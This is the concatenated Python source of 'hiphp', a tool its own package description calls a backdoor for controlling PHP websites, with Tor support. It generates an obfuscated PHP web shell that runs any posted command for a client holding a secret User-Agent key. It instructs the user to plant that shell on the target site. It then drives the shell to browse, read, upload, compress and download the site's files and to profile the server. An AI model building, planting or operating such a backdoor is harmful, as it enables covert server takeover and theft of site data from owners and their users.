#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
from hexor import *
from biglibrary import *

# logo:
def logo(__version__):
    logo=""
    c_red="#ea4335"#red
    c_blue="#4285f4"#blue
    c_yellow="#fbbc05"#yellow
    c_green="#34a853"#green
    c_white="#f7f7f7"

    color=hexor(True,"hex")
    bl=biglibrary(returning=True)
    logox="\n"
    logox+=color.c(bl.center("             ▄███████▄    ▄█    █▄       ▄███████▄"),c_red)
    logox+="\n"
    logox+=color.c(bl.center("            ███    ███   ███    ███     ███    ███"),c_red)
    logox+="\n"
    logox+=color.c(bl.center("╦   ╦       ███    ███   ███    ███     ███    ███"),c_red)
    logox+="\n"
    logox+=color.c(bl.center("║   ║ ═╦═ ▀█████████▀  ▀▀███▀▀▀▀███▀  ▀█████████▀ "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("╠═══╣  ║    ███          ███    ███     ███       "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("║   ║  ║    ███          ███    ███     ███       "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("╩   ╩ ═╩═  ▄████▀        ███    █▀     ▄████▀     "),c_red)
    logox+="\n"
    logox+=color.c(bl.center("+------------------------------------------------------+"),c_red)
    logox+="\n"
    logox+=color.c(bl.center(f"hiphp v{__version__} by yasserbdj96"),c_green)
    logox+="\n"
    logox+=color.c(bl.center(f"https://yasserbdj96.github.io/hiphp/"),c_blue)
    logox+="\n"
    logox+=color.c(bl.center("+------------------------------------------------------+"),c_red)
    logox+="\n"
    logox+=color.c("\n [!] '--help' for more informations.\n",c_yellow)
    logox+=color.c(" [!] '--exit' OR 'Ctrl+C' for exit.\n",c_yellow)
    #logox+="\n"

    return logox
#
try:
    import sys
    from hiphpversion import __version__
    if sys.argv[1]=="ok_view":
        print(logo(__version__))
except:
    pass
#}END.



#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
from hiphp.hiphpversion import __version__
from hiphp.hiphpcoding import rot13,tobase64,tomd5
from hiphp.hiphpphpfunctions import *
from hiphp.hiphphelp import help
from hiphp.hiphpmsgs import *
from hiphp.hiphplicense import license
from hiphp.hiphpabout import about
from hiphp.hiphplogo import *
#from ashar import *
from hexor import *
#from asciitext import *
import requests
import re
import ast
from os.path import exists
from biglibrary import *
import base64

import os
if os.name == 'nt':
    os.system('color')
    #    import readline

#start hiphp class:
class hiphp:
    #__init__:
    def __init__(self,key,url,retu=False):
        #
        self.key=tomd5(key)# Encrypt the 'key' with 'md5'.
        self.url=url
        self.retu=retu

        #
        url_w=re.compile(r"https?://(www\.)?")
        self.url_w=url_w.sub('',url).strip().strip('/')
        self.headers={'User-Agent':self.key}

        #colors with hexor:
        self.color=hexor(True,"hex")
        self.color2=hexor(False,"hex")

        #used hex colors in this programm:
        self.c_red="#ea4335"#red
        self.c_white_red="#f3938b"#white-red
        self.c_blue="#4285f4"#blue
        self.c_yellow="#fbbc05"#yellow
        self.c_green="#34a853"#green
        #
        self.set=""
        self.cd=""
        self.do_x=0

        #
        self.sep=os.sep

    #cli:
    def cli(self):
        #logo
        logox=""
        if self.do_x==0:
            logox=logo(__version__)
            self.do_x+=1

        #getcwd
        getcwd=""
        reee=hiphp.do(self,self.key,self.url,self.headers,True,"echo getcwd();")
        if emsg_1 in reee:
            return reee
        else:
            getcwd=self.color.c(reee,self.c_green)
        #
        xxr1=self.color.c('┌──(',self.c_blue)
        xxr2=self.color.c(')──[',self.c_blue)
        xxr3=self.color.c(']',self.c_blue)
        xxr4=self.color.c('└─|>',self.c_blue)
        #
        key_w_color=self.color.c(self.key,self.c_red)
        url_w_color=self.color.c(self.url_w,self.c_yellow)
        at=self.color.c("||",self.c_blue)
        print(logox+"\n"+xxr1+key_w_color+at+url_w_color+xxr2+getcwd+xxr3)

        #try:
        command=input(xxr4)
        #except:
        #    exit()
        if command and command!="":
            #help
            if command[0:6].lower()=="--help" or command[0:4].lower()=="help":
                help_c=command.split(" ")
                try:
                    help(__version__,help_c[1])
                except:
                    print(help(__version__))
            #exit
            elif command[0:6].lower()=="--exit" or command[0:4].lower()=="exit":
                exit()
            #license
            elif command[0:9].lower()=="--license" or command[0:7].lower()=="license":
                print(license())
            #about
            elif command[0:7].lower()=="--about" or command[0:5].lower()=="about":
                print(about())
            #download
            elif command[0:6].lower()=="--down" or command[0:4].lower()=="down":
                down=command.split(" ")
                try:
                    if down[1].lower()=="-f":
                        """command=file_get_contents(down[2])
                        content=hiphp.do(self,self.key,self.url,self.headers,True,command)
                        try:
                            out_path=down[3]
                        except:
                            out_path=""
                        finally:
                            f = open(out_path+down[2], "w+")
                            f.write(content)
                            f.close()"""
                        try:
                            out_path=down[3]
                        except:
                            out_path=""
                        print(smsg_1+hiphp.download(self,down[2],out_path))
                    elif down[1].lower()=="-d":
                        try:
                            zip_file_name=hiphp.compress(self,down[2])
                        except:
                            zip_file_name=hiphp.compress(self)
                        #zip_file_name=hiphp.do(self,self.key,self.url,self.headers,True,command)

                        try:
                            out_path=down[3]
                        except:
                            out_path=""
                        print(smsg_1+hiphp.download(self,zip_file_name,out_path))
                    elif down[1].lower()=="-all":
                        try:
                            out_path=down[2]
                        except:
                            out_path=""
                        zip_file_name=hiphp.compress(self)
                        print(smsg_1+hiphp.download(self,zip_file_name,out_path))

                except:
                    help(__version__,"--down")
            #zip
            elif command[0:5].lower()=="--zip" or command[0:3].lower()=="zip":
                ziping=command.split(" ")
                try:
                    zip_file_name=hiphp.compress(self,ziping[1])
                except:
                    zip_file_name=hiphp.compress(self)
                print(smsg_2+reee+"/"+zip_file_name)

            #update
            elif command[0:8].lower()=="--update" or command[0:6].lower()=="update":
                r="https://raw.githubusercontent.com/yasserbdj96/hiphp/main/version.txt"
                version = requests.get(r).text
                version=version.replace('\n', ' ').replace('\r', '').replace(' ', '')
                if version==__version__:
                    new=False
                else:
                    p1,p2,p3=version.split(".")
                    s1,s2,s3=__version__.split(".")
                    if p1>=s1 and p2>=s2 and p3>s3:
                        new=True
                    elif p1>=s1 and p2>s2 and p3<=s3:
                        new=True
                    else:
                        new=False
                if new==True:
                    print(msg_2+version)
                    print(msg_3)
                else:
                    print(msg_4)
            #ls
            elif command[0:4].lower()=="--ls" or command[0:2].lower()=="ls":
                if len(command)==4 or len(command)==2:
                    command=scandir()
                elif command[0:4].lower()=="--ls" and command[5:9].lower()=="-all":
                    dirx=command[10:]
                    if dirx=="":
                        dirx="./"
                    command=scandir_all(dirx)
                elif command[0:2].lower()=="ls" and command[3:7].lower()=="-all":
                    dirx=command[8:]
                    if dirx=="":
                        dirx="./"
                    command=scandir_all(dirx)
                else:
                    if len(command)==4:
                        dirx=command[5:]
                    else:
                        dirx=command[3:]
                    
                    if dirx[-1]!="/":
                        dirx+="/"
                    command=scandir(dirx)
                sd=hiphp.do(self,self.key,self.url,self.headers,True,command)
                x=ast.literal_eval(sd)

                for i in range(len(x)):
                    if x[i]!="." and x[i]!="..":
                        x[i]=x[i].replace("\/","/")
                biglibrary().lslist(x,separator=" | ")
            #set
            elif command[0:4].lower()=="--cd" or command[0:2].lower()=="cd":
                self.cd=""
                if command[0:4].lower()=="--cd":
                    self.cd=f"chdir('{reee}/{command[5:]}');"
                else:
                    self.cd=f"chdir('{reee}/{command[3:]}');"
            #set
            elif command[0:5].lower()=="--set" or command[0:3].lower()=="set":
                if command[0:5].lower()=="--set":
                    self.set+=command[6:]
                else:
                    self.set+=command[4:]
            #delete set
            elif command[0:6].lower()=="--dset" or command[0:4].lower()=="dset":
                self.set=""
            #clear
            elif command[0:5].lower()=="--cls" or command[0:3].lower()=="cls":
                os.system('cls' if os.name == 'nt' else 'clear')
            #Get the hole Code
            elif command[0:6].lower()=="--geth" or command[0:15].upper()=="HIPHP_HOLE_CODE" or command[0:4].lower()=="geth":
                hiphp.get_hole(self,get=True)
            #cat
            elif command[0:5].lower()=="--cat" or command[0:3].lower()=="cat":
                if command[0:5].lower()=="--cat":
                    dirx=command[6:]
                else:
                    dirx=command[4:]
                command=file_get_contents(dirx)
                hiphp.do(self,self.key,self.url,self.headers,False,command)
            #php_info:
            elif command[0:9].lower()=="--phpinfo" or command[0:7].lower()=="phpinfo":
                command=php_info()
                hiphp.do(self,self.key,self.url,self.headers,False,command)
            #rf
            elif command[0:4].lower()=="--rf" or command[0:2].lower()=="rf":
                varss=command.split(" ")
                if varss[len(varss)-1]=="":
                    del varss[len(varss)-1]
                print(hiphp.run_file(self,varss[1],varss[2:]))
            #up
            elif command[0:4].lower()=="--up" or command[0:2].lower()=="up":
                v=command.split(" ")
                #print(v)
                if len(v)>2:
                #try:
                    file_path=v[1]
                    to=v[2]
                    if to[len(to)-1:len(to)]!="/":
                        to=to+"/"
                    hiphp.upload(self,file_path,to)                    
                #except:
                else:
                    hiphp.upload(self,command.split(" ")[1])
            else:
                comand_return=hiphp.do(self,self.key,self.url,self.headers,True,command)
                if comand_return!="":
                    print(comand_return)
                else:
                    self.color2.c(errx+" "+command+emsg_6,self.c_red)
        else:
            self.color2.c(emsg_2,self.c_red)
        hiphp.cli(self)

    #do:
    def do(self,key,url,header,retu,command):
        regex = re.compile(r"^https?\:\/\/[\w\-\.]+\.onion")
        proxies = {'http': 'socks5h://127.0.0.1:9150','https': 'socks5h://127.0.0.1:9150'}
        try:
            if regex.match(url):
                #.onion
                response=requests.post(url,headers=header,proxies=proxies)
            else:
                response=requests.post(url,headers=header)
            #response=requests.post(url,headers=header)
            #
            if response.status_code==200:
                key_len=len(key)+1
                # if the key are true:
                if response.text[0:key_len]=="#"+key:
                    ploads={'command':self.cd+self.set+command}
                    if ".onion" in url:
                        response=requests.post(url,headers=header,data=ploads,proxies=proxies)
                    else:
                        response=requests.post(url,headers=header,data=ploads)
                    response_text=response.text[key_len:]
                    if retu==True:
                        return response_text
                    else:
                        if len(response_text)!=0:
                            print(response_text)
                else:
                    if retu==True:
                        return emsg_1
                    else:
                        hexor().c(emsg_1,self.c_red)
                        exit()
        except:
            hexor().c(emsg_3+" '"+url+"'.",self.c_red)
            exit()

    #run_file:
    def run_file(self,file_path,*opts):        
        if exists(file_path):
            open_file=open(file_path).read()
            #
            if open_file[0:5]=="<?php":
                open_file=open_file[6:]
            if open_file[len(open_file)-2:len(open_file)]=="?>":
                open_file=open_file[:len(open_file)-2]
            #
            if len(opts)>0:
                if type(opts[0])==list:
                    opts=opts[0]
                #
                for i in range(len(opts)):
                    value,string=opts[i].split("==")
                    open_file=open_file.replace(f"__{value}__",string)
            
            result=hiphp.do(self,self.key,self.url,self.headers,True,open_file)
            if self.retu==False:
                print(result)
            return result
        else:
            self.color2.c(emsg_4,self.c_red)

    #run:
    def run(self,command):
        if self.retu==True:
            return hiphp.do(self,self.key,self.url,self.headers,True,command)
        else:
            hiphp.do(self,self.key,self.url,self.headers,False,command)

    #upload:
    def upload(self,path_to_upluad,to=""):
        try:
            with open(path_to_upluad,"rb") as base64_file:
                encoded_string=tobase64(base64_file.read().decode("utf-8"))
            p=""
            if to!="":
                if to[0:2]!="./":
                    p="./"
                hiphp.run(self,"if(!file_exists('"+p+to+"')){mkdir('"+p+to+"',0777,true);}")
            hiphp.run(self,f'Fwrite(fopen("{p+to+os.path.basename(path_to_upluad)}","w+"),base64_decode("{encoded_string}"));')
        except:
            self.color2.c(f"{emsg_5} '{path_to_upluad}'.",self.c_red)

    #compress:
    def compress(self,path=""):
        if path!="":
            command=zip_path(path)
        else:
            command=zip_path()
        zip_file_name=hiphp.do(self,self.key,self.url,self.headers,True,command)
        if self.retu==False:
            print(zip_file_name)
        return zip_file_name

    #download:
    def download(self,path_x,outpath=""):
        new_command=file_to_b64(path_x)
        
        if outpath=="":
            outpath=os.path.abspath(os.getcwd())
        
        if outpath[-1]!=self.sep:
            outpath+=self.sep

        down_path=outpath+""+path_x

        zip_file_b64_content=hiphp.do(self,self.key,self.url,self.headers,True,new_command)
        with open(down_path, 'wb') as f:  
            f.write(base64.b64decode(zip_file_b64_content))
        f.close()

        if self.retu==False:
            print(down_path)
        return down_path

    #get the hole:
    def get_hole(self,get=False):
        code="if($_SERVER['HTTP_USER_AGENT']=='"+self.key+"'){echo'#"+self.key+"';if(isset($_POST['command'])){eval($_POST['command']);}exit;}"
        code=rot13(tobase64(rot13(tobase64(rot13(code)))))
        code=f"eval(str_rot13(base64_decode(str_rot13(base64_decode(str_rot13('{code}'))))));"
        php_s="/*HIPHP_HOLE_CODE START*/"
        php_e="/*HIPHP_HOLE_CODE END*/"

        if self.retu==True and get==False:
            return php_s+"\n"+code+"\n"+php_e
        else:
            geth=self.color.c(msg_1+"\n",self.c_yellow)
            geth+=self.color.c(php_s+"\n",self.c_red)
            geth+=self.color.c(code+"\n",self.c_green)
            geth+=self.color.c(php_e,self.c_red)
            print(geth)
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
errx="[✗]"
emsg_1=f"{errx} We were unable to recognize the hiphp identifier."
emsg_2=f"{errx} Command not found!"
emsg_3=f"{errx} We could not contact the site"
emsg_4=f"{errx} The file you entered does not exist."
emsg_5=f"{errx} We could not upload the file"
emsg_6=": Command does not exist or ended with a server error."

msgi="[!]"
msg_1=f"{msgi} Copy the PHP code below to the website path you entered:"
msg_2=f"{msgi} There is a new update "
msg_3=f"{msgi} Download the new version from 'https://github.com/yasserbdj96/hiphp'"
msg_4=f"{msgi} No updates available"

msgs="[✓]"
smsg_1=f"{msgs} File downloaded in: "
smsg_2=f"{msgs} The path has been compressed into: "
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
import base64
import hashlib

#torot13:
def rot13(text):
    rot13=str.maketrans("ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz","NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
    return str.translate(text,rot13)

#tobase64:
def tobase64(data):
    return base64.b64encode(data.encode('utf-8')).decode('utf-8')

#from base64:
def fromb64(text):
    return base64.b64decode(text.encode('utf-8')).decode('utf-8')

#tomd5:
def tomd5(data):
    return hashlib.md5(data.encode('utf-8')).hexdigest()
#}END.



#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
#
def scandir(dirx="./"):
    x="""
$fileList=array();
$path='"""+dirx+"""';
if($handle=opendir($path)){
    while(false!==($entry=readdir($handle))){
        if($entry!="." && $entry!=".."){
            if(is_dir($entry)){
                $entry=$path.$entry."/";
            }else{
                $entry=$path.$entry;
            }
            $fileList[]=$entry;
        }
    }
    closedir($handle);
}
echo json_encode($fileList);"""
    return x
#
def scandir_all(dirx="./"):
    x="""
function getDirContents($dir="./",$relativePath=false){
    $fileList=array();
    $iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    foreach($iterator as $file){
        if ($file->isDir()) continue;
        $path=$file->getPathname();
        if ($relativePath) {
            $path=str_replace($dir,'',$path);
            $path=ltrim($path, '/');
        }
        $fileList[]=$path;
    }
    return $fileList;
}
echo json_encode(getDirContents('"""+dirx+"""'));"""
    return x
#
def file_get_contents(dirx):
    return f"""echo file_get_contents('{dirx}');"""

#
def zip_path(path="./"):
    php_zip_code="""// Get real path for our folder
$rootPath = realpath('"""+path+"""');

$hash=date("ymdHis");

// Initialize archive object
$zip = new ZipArchive();
$zip->open($hash.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);

// Create recursive directory iterator
/** @var SplFileInfo[] $files */
$files = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($rootPath),
    RecursiveIteratorIterator::LEAVES_ONLY
);

foreach ($files as $name => $file)
{
    // Skip directories (they would be added automatically)
    if (!$file->isDir())
    {
        // Get real and relative path for current file
        $filePath = $file->getRealPath();
        $relativePath = substr($filePath, strlen($rootPath) + 1);

        // Add current file to archive
        $zip->addFile($filePath, $relativePath);
    }
}

// Zip archive will be created only after closing object
$zip->close();
echo $hash.".zip";"""
    return php_zip_code

#
def file_to_b64(path):
    code="""
$file='"""+path+"""';
$fp=fopen($file, "rb");
$binary=fread($fp,filesize($file));
echo base64_encode($binary);"""
    return code

#
def php_info():
    code="""header('Content-type: text/plain');
    echo "OS : ".php_uname();
    echo "\n";
    echo "your_ip: ".$_SERVER['REMOTE_ADDR'];
    echo "\n";
    echo "HTTP_HOST : ".$_SERVER['HTTP_HOST'];
    echo "\n";
    echo "REQUEST_METHOD : ".$_SERVER['REQUEST_METHOD'];
    echo "\n";
    echo "SERVER_ADMIN : ".$_SERVER['SERVER_ADMIN'];
    echo "\n";
    echo "SERVER_PORT : ".htmlentities($_SERVER['SERVER_PORT'], ENT_QUOTES, 'UTF-8');
    echo "\n";
    echo "server_ip : ".gethostbyname($_SERVER["HTTP_HOST"]);
    echo "\n";
    echo "PHP_SELF : ".$_SERVER['PHP_SELF'];
    echo "\n";
    echo "GATEWAY_INTERFACE : ".$_SERVER['GATEWAY_INTERFACE'];
    echo "\n";
    echo "SERVER_ADDR : ".$_SERVER['SERVER_ADDR'];
    echo "\n";
    echo "SERVER_NAME : ".$_SERVER['SERVER_NAME'];
    echo "\n";
    echo "SERVER_PROTOCOL : ".$_SERVER['SERVER_PROTOCOL'];
    echo "\n";
    echo "REQUEST_TIME : ".$_SERVER['REQUEST_TIME'];
    echo "\n";
    echo "QUERY_STRING : ".$_SERVER['QUERY_STRING'];
    echo "\n";
    echo "HTTP_ACCEPT : ".$_SERVER['HTTP_ACCEPT'];
    echo "\n";
    echo "HTTP_ACCEPT_CHARSET : ".$_SERVER['HTTP_ACCEPT_CHARSET'];
    echo "\n";
    echo "HTTP_REFERER : ".$_SERVER['HTTP_REFERER'];
    echo "\n";
    echo "HTTPS : ".$_SERVER['HTTPS'];
    echo "\n";
    echo "REMOTE_HOST : ".$_SERVER['REMOTE_HOST'];
    echo "\n";
    echo "REMOTE_PORT : ".$_SERVER['REMOTE_PORT'];
    echo "\n";
    echo "SCRIPT_FILENAME : ".$_SERVER['SCRIPT_FILENAME'];
    echo "\n";
    echo "SERVER_SIGNATURE : ".$_SERVER['SERVER_SIGNATURE'];
    echo "\n";
    echo "PATH_TRANSLATED : ".$_SERVER['PATH_TRANSLATED'];
    echo "\n";
    echo "SCRIPT_NAME : ".$_SERVER['SCRIPT_NAME'];
    echo "\n";
    echo "SCRIPT_URI : ".$_SERVER['SCRIPT_URI'];
    echo "\n";
    echo "server_software : ".getenv("SERVER_SOFTWARE");
    echo "\n";
    echo "Php Version : ".phpversion();
    echo "\n";
    echo "Zend : ".htmlentities(zend_version(), ENT_QUOTES, 'UTF-8');
    echo "\n";
    echo "Oracle : ".$Oracle2=function_exists('ocilogon')?("ON"):("OFF");   
    echo "\n";
    echo "MySQL : ".$MySQL2=function_exists('mysql_connect')?("ON"):("OFF");
    echo "\n";
    echo "MSSQL : ".$MSSQL2=function_exists('mssql_connect')?("ON"):("OFF");
    echo "\n";
    echo "PostgreSQL : ".$pg_connect2=function_exists('pg_connect')?("ON"):("OFF");
    echo "\n";
    echo "disabled_functions : ".$r=ini_get('disable_functions') ? ini_get('disable_functions'):'none';
    echo "\n";"""
    return code
#}END.



#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
def help(__version__,opt=""):
  #
  spsbar=""""""

  #
  header=f"""hiphp V{__version__} - (C) 2010-2022 yasserbdj96
https://github.com/yasserbdj96/hiphp

  Command                            Description
  -------                            -----------"""

  #
  OPTIONS="""
[OPTIONS]

  --help, help                       ─> # Display this help.
  --help [ACTIONS], help [ACTIONS]   ─> # Help for a specific command.
  --geth, geth                       ─> # Get the hole Code, "HIPHP_HOLE_CODE" It has the same purpose.
  --phpinfo, phpinfo                 ─> # Some information about the server.
  --cls, cls                         ─> # Clear console.
  --exit, exit                       ─> # Exit this console.
"""

  #
  ACTIONS="""
[ACTIONS]
"""

  #
  ls_c="""
  --ls, ls                           ─> # List information about the FILEs (the current directory by default).
  Usage: --ls [OPTION] [PATH], ls [OPTION] [PATH]
  Mandatory arguments to long options:
    --ls                             ─> # Get a list of all files and folders from the current directory.
    --ls [PATH]                      ─> # Get a list of all files and folders from a specified directory.
    --ls -all                        ─> # Get a list of all files, folders and subfolders from the current directory.
    --ls -all [PATH]                 ─> # Get a list of all files, folders and subfolders from a specified directory.
"""

  #
  cat_c="""
  --cat, cat                         ─> # Concatenate FILE to standard output.
  Usage: --cat [FILE_PATH]
"""

  #
  set_c="""
  --set, set                         ─> # Create a code that is always saved on during work.
  Usage: --set [PHP_CODE]
  You can return the initial value with "--dset" or "dset".
"""

  #
  cd_c="""
  --cd, cd                           ─> # Change directory.
  Usage: --cd [PATH]
"""

  #
  rf_c="""
  --rf, rf                           ─> # Run code from file.
  Usage: --rf [FILE_PATH] [VARIABLES]
  Mandatory arguments to long options:
    --rf [FILE_PATH]                 ─> # Run code from file.
    --rf [FILE_PATH] [VARIABLES]     ─> # Run code from file with variables, EX: --rf example.php var==hello
  """

  #
  up_c="""
  --up, up                           ─> # Upload a file.
  Usage: --up [FILE_PATH] [PATH]
  Mandatory arguments to long options:
    --up [FILE_PATH]                 ─> # Upload a file to the current directory.
    --up [FILE_PATH] [PATH]          ─> # Upload a file to a specified directory.
"""

  #
  down_c="""
  --down, down                       ─> # download a file.
  Usage: --down [-f/-d] [FILE/DIR_PATH] [OUT_PATH]
  Mandatory arguments to long options:
    --down -f [FILE_PATH]            ─> # Download a file to the current directory.
    --down -f [FILE_PATH] [OUT_PATH] ─> # Download file to a specified directory.
    --down -d [DIR_PATH]             ─> # Download a folder to the current directory.
    --down -d [DIR_PATH] [OUT_PATH]  ─> # Download folder to a specified directory.
    --down -all                      ─> # Download all files to the current directory.
    --down -all [OUT_PATH]           ─> # Download all files to a specified directory.
"""

  #
  zip_c="""
  --zip, zip                         ─> # Compress a directory.
  Usage: --zip [DIR_PATH]
  Mandatory arguments to long options:
    --zip                            ─> # Compress the current directory.
    --zip [DIR_PATH]                 ─> # Compress a specific directory.
"""
  #
  ABOUT="""
[ABOUT]

  --update, update                   ─> # check for updates.
  --license, license                 ─> # This project license.
  --about, about                     ─> # About this project."""
  if opt=="":
    return header+OPTIONS+ACTIONS+ls_c+spsbar+cat_c+spsbar+set_c+spsbar+cd_c+spsbar+rf_c+spsbar+up_c+spsbar+down_c+spsbar+zip_c+spsbar+ABOUT
  else:
    opt=opt.replace("--","")
    opt=opt+"_c"
    x=""
    exec(f"print({opt})")
#}END.


#!/usr/bin/env python
# coding:utf-8
#   |                                                          |
# --+----------------------------------------------------------+--
#   |   Code by : yasserbdj96                                  |
#   |   Email   : yasser.bdj96@gmail.com                       |
#   |   Github  : https://github.com/yasserbdj96               |
#   |   BTC     : bc1q2dks8w8uurca5xmfwv4jwl7upehyjjakr3xga9   |
# --+----------------------------------------------------------+--  
#   |        all posts #yasserbdj96 ,all views my own.         |
# --+----------------------------------------------------------+--
#   |                                                          |

#START{
from hiphp.hiphpversion import __version__
from setuptools import setup,find_packages

setup(
    name="hiphp",
    version=__version__,
    author="yasserbdj96",
    author_email="yasser.bdj96@gmail.com",
    description='''hiphp - free & open source project for create a BackDoor to control php-based sites In the normal internet or sites in The Onion Router (tor network).''',
    long_description_content_type="text/markdown",
    long_description=open('README.md','r', encoding="utf8").read(),
    license='''MIT License''',
    packages=find_packages(),
    project_urls={
        'Source': "https://github.com/yasserbdj96/hiphp",
        'Documentation': "https://yasserbdj96.github.io/hiphp",
        'Chat': "https://gitter.im/yasserbdj96/hiphp",
        'WebSite':"https://yasserbdj96.github.io/"
    },
    install_requires=["requests","hexor","biglibrary"],
    keywords=["windows","macos","linux","docker","cli","php","http","remoteaccess","backdoor","controller","https","hacking","python3","onion","termux","payload","website-hacking","yasserbdj96","revisioncontrol","hiphp"],
    classifiers=[
        "Environment :: Web Environment",
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3 :: Only",
        "Operating System :: Unix",
        "Operating System :: MacOS :: MacOS X",
        "Operating System :: Microsoft :: Windows",
        "Topic :: Software Development :: Build Tools",
        "Topic :: Software Development :: Libraries",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Internet :: WWW/HTTP"
    ],
    python_requires=">=3.x.x"
)
#}END.